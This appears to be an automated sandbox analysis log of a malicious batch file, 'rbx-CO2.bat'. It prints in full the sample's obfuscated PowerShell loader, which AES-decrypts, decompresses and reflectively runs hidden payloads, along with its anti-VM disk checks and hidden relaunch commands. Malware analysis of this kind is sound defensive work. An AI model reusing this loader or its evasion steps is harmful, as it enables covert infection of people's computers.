Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:thuufdhjxkhq{param([outputtype([type])][parameter(position=0)][type[]]$yflwifejwhebpy,[parameter(position=1)][type]$nxinipbkxv)$ymlvqpdcphk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+''+[char](102)+''+'l'+''+[char](101)+'ct'+[char](101)+'d'+'d'+''+[char](101)+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+'m'+''+[char](101)+''+[char](109)+''+'o'+''+[char](114)+'y'+[char](77)+''+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+[char](121)+''+[char](68)+''+[char](101)+''+[char](108)+''+[char](101)+'g'+[char](97)+''+[char](116)+''+[char](101)+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+'s'+[char](44)+''+[char](80)+''+'u'+''+[char](98)+'l'+[char](105)+''+[char](99)+','+[char](83)+''+[char](101)+''+[char](97)+''+'l'+''+'e'+''+[char](100)+''+[char](44)+'a'+[char](110)+''+[char](115)+'i'+[char](67)+'l'+[char](97)+''+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+'s'+'',[multicastdelegate]);$ymlvqpdcphk.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+'p'+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+'e,'+'h'+''+'i'+''+[char](100)+''+'e'+''+[char](66)+''+'y'+'s'+[char](105)+''+'g'+''+','+''+[char](80)+'u'+[char](98)+''+'l'+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$yflwifejwhebpy).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+'me,m'+[char](97)+''+'n'+''+'a'+''+[char](103)+''+'e'+'d');$ymlvqpdcphk.definemethod(''+'i'+''+'n'+'v'+[char](111)+'k'+[char](101)+'',''+'p'+''+'u'+''+'b'+'li'+'c'+''+','+''+'h'+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+''+'g'+''+[char](44)+''+[char](78)+''+'e'+''+'w'+''+[char](83)+''+'l'+'o'+[char](116)+','+'v'+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+''+[char](108)+'',$nxinipbkxv,$yflwifejwhebpy).setimplementationflags(''+[char](82)+'unt'+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+'a'+[char](103)+''+'e'+''+[char](100)+'');write-output $ymlvqpdcphk.createtype();}$tbozpeexdclpo=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+'st'+'e'+''+'m'+''+'.'+''+[char](100)+'l'+'l'+'')}).gettype(''+[char](77)+'icr'+'o'+''+'s'+''+'o'+''+[char](102)+''+[char](116)+''+[char](46)+''+'w'+''+[char](105)+'n'+[char](51)+''+'2'+''+[char](46)+''+[char](85)+''+[char](110)+''+[char](115)+'af'+[char](101)+''+[char](78)+'a'+[char](116)+''+'i'+''+'v'+''+'e'+'met'+[char](104)+''+'o'+''+[c
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 38_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 38_2_0000000140002300
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: dwm.exe, 0000002A.00000000.2786292411.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002A.00000002.3476487461.000001D159439000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\cmd.exe Code function: 17_3_00000253FC3E2AF0 cpuid 17_3_00000253FC3E2AF0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
